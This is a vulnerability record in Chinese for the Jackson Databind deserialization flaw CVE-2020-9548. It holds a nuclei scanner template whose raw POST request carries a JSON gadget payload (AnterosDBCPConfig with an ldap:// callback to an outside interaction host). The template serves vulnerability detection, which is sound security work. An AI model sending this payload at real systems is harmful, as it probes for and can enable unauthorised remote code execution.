漏洞信息
漏洞名称: FasterXML Jackson Databind Remote Code Execution Vulnerability
漏洞编号:
漏洞类型: 反序列化
漏洞等级: 严重
漏洞描述: FasterXML Jackson Databind是一个流行的Java库,用于将Java对象序列化为JSON和反序列化JSON为Java对象。它广泛应用于各种Java应用程序中,特别是在Web服务中处理JSON数据时。由于其广泛的使用,该库中的漏洞可能影响到大量的应用程序和服务。该漏洞涉及FasterXML jackson-databind 2.x版本,直到2.9.10.4,处理序列化小工具和类型交互时存在缺陷,特别是与br.com.anteros.dbcp.AnterosDBCPConfig(也称为anteros-core)相关的部分。这种反序列化漏洞的根源在于库未能正确验证和限制反序列化过程中的输入,导致攻击者可以构造恶意的JSON数据,利用特定的类路径和序列化小工具链执行远程代码。这种漏洞的影响极为严重,因为它允许攻击者在目标系统上执行任意代码,可能导致完全的系统控制、数据泄露或服务中断。攻击者无需认证即可利用此漏洞,且可以远程触发,使得攻击易于自动化和大规模利用。
产品厂商: fasterxml
产品名称: jackson-databind
影响版本: 2.x <= 2.9.10.4
来源: https://github.com/projectdiscovery/nuclei-templates/blob/2e403faa7883debf7116bed29e8c86c10af1c37d/http%2Fcves%2F2020%2FCVE-2020-9548.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
|
id: CVE-2020-9548
info:
name: FasterXML Jackson Databind <=2.9.10.4 - Remote Code Execution
author: tomaquet18
severity: critical
description: |
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-9548
- https://github.com/fairyming/CVE-2020-9548
- https://www.sangfor.com/blog/cybersecurity/fasterxml-jackson-databind-remote-code-execution-vulnerability-cve-2020-9548
- https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3Cissues.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3Cdev.zookeeper.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-9548
cwe-id: CWE-502
epss-score: 0.13945
epss-percentile: 0.93967
cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: fasterxml
product: jackson-databind
tags: cve,cve2020,jackson,fasterxml,rce
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[
"br.com.anteros.dbcp.AnterosDBCPConfig",
{
"healthCheckRegistry": "ldap://{{interactsh-url}}"
}
]
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
internal: true
extractors:
- type: dsl
dsl:
- "BaseURL"
|